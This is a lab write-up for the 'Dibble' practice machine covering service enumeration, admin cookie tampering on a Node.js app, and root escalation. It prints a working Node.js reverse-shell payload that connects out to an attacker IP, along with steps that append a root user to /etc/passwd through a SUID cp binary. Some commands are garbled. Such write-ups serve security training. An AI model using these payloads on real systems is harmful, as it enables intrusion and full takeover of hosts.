Dibble

Information Gathering (Enumeration)

Initial rustscan shows 5 ports open.

Port 21

vsftpd 3.0.3

Not know exploits for this but whenever I see this service with this version.There are possibility of LFI.

Try uploading file.
try Anonymous login
try admin login
try to find a file if access to some directory is provided.
see if its the database for webserver.
ftp bruteforce

The server hangs after connecting to it using anonymous login. The possible reason here is that in FTP the control connection is separate from data connection and firewall is blocking the connection.

Check after getting root, what is the problem with ftp.

Port 22

OpenSSH 8.3 (protocol 2.0)

No known exploits for this.

Still try to use exploit db to look if there is something for this version
ssh bruteforce. bruteforce pending

Port 80

Apache httpd 2.4.46 ((Fedora))
Drupal 9

I havent encounterd any this yest for this particular version Nmap also shows drupal 9 running.

nikto
feroxbuster
view page source code
upload functionality
droopescan

| http-robots.txt: 22 disallowed entries 
| /core/ /profiles/ /README.txt /web.config /admin/ 
| /comment/reply/ /filter/tips /node/add/ /search/ /user/register/ 
| /user/password/ /user/login/ /user/logout/ /index.php/admin/ 
| /index.php/comment/reply/ /index.php/filter/tips /index.php/node/add/ 
| /index.php/search/ /index.php/user/password/ /index.php/user/register/ 
|_/index.php/user/login/ /index.php/user/logout/

Nikto

└─$ nikto -host 192.168.230.110 -port 80 | tee log.80.nikto.$(date +%s)
 
+ /: Retrieved x-powered-by header: PHP/7.4.10.
 
 
'/filter/tips/' 
'/index.php/user/register/
'/user/password/'
'/user/register/'
'/index.php/user/password/
+'/README.txt' 
+ /core/:
+ /profiles/
'/user/login/
 
+ OPTIONS: Allowed HTTP Methods: GET, POST .
 
+ /web.config: ASP config file is accessible.
+ /icons/: Directory indexing found.
+ /INSTALL.txt: Default file found.
+ /LICENSE.txt: License file found may identify site software.
+ /icons/README: Apache default file found. See: https://www.vntweb.co.uk/apache-restricting-access-to-iconsreadme/
+ /sites/: Directory indexing found.
+ /composer.json: PHP Composer configuration file reveals configuration information. See: https://getcomposer.org/
+ /composer.lock: PHP Composer configuration file reveals configuration information. See: https://getcomposer.org/
+ /core/modules/config/config.info.yml: Drupal version number revealed in config.info.yml.
+ /core/CHANGELOG.txt: Drupal version number revealed in CHANGELOG.txt.

Droopescan

 
 droopescan scan drupal -u 192.168.230.110 -t 32
 
[+] Themes found:
    gin http://192.168.230.110/themes/gin/
        http://192.168.230.110/themes/gin/README.md
        http://192.168.230.110/themes/gin/LICENSE.txt
 
[+] Possible version(s):
    9.0.6
    9.0.7
 
[+] Possible interesting urls found:
    Default admin - http://192.168.230.110/user/login

Port 3000

Node.js running (Express middle ware)

Port 37017 Mongo DB

MongoDB 4.2.9 4.2.9
Exploit db
Node.js (3000)

http://192.168.249.110:3000/auth/register

Let’s create an account for the test and look at the cookie

Decode

First url then base64

default

Type admin and encrypt

First base64 then url

Paste back

Refresh the page

Visit http://192.168.249.110:3000/logs

Create a new log

if we look at the logs

We see a Javascript vulnerability. Let’s use it.

javascript shell

(function(){  
 var net = require(“net”),  
 cp = require(“child_process”),  
 sh = cp.spawn(“/bin/bash”, []);  
 var client = new net.Socket();  
 client.connect(21, “192.168.49.248”, function(){  
 client.pipe(sh.stdin);  
 sh.stdout.pipe(client);  
 sh.stderr.pipe(client);  
 });  
 return /a/;  
})();

When we paste this payload and register it, we get a shell

$n c - n v lp 21$ python3 -c ‘import pty;pty.spawn(“/bin/bash”);’ $e x p or tTERM = x t er m Ct r l + z$ stty raw -echo ; fg
$ reset

Privesc (cp)

[benjamin@dibble app]$ find / -perm -u=s -type f 2>/dev/null
/usr/bin/gpasswd
/usr/bin/fusermount
**/usr/bin/cp
**/usr/bin/umount
/usr/bin/sudo
/usr/bin/chage
/usr/bin/mount
/usr/bin/passwd
/usr/bin/su
/usr/bin/newgrp
/usr/sbin/grub2-set-bootflag
/usr/sbin/unix_chkpwd
/usr/sbin/pam_timestamp_check

Add a new user

[benjamin@dibble app] $c a t / e t c / p a ss w d > p a ss w d . bak [b e njamin @ d ibb l e]$ openssl passwd pass1234[benjamin@dibble app]$ echo “root2:NTOdsvj8zdrXs:0:0:root:/root:/bin/bash” >> passwd.bakNTOdsvj8zdrXs = pass1234

Root

[benjamin@dibble app]$ su root2
Password:
[root@dibble app]# whoami
root

Malleum Knowledge Base

Explorer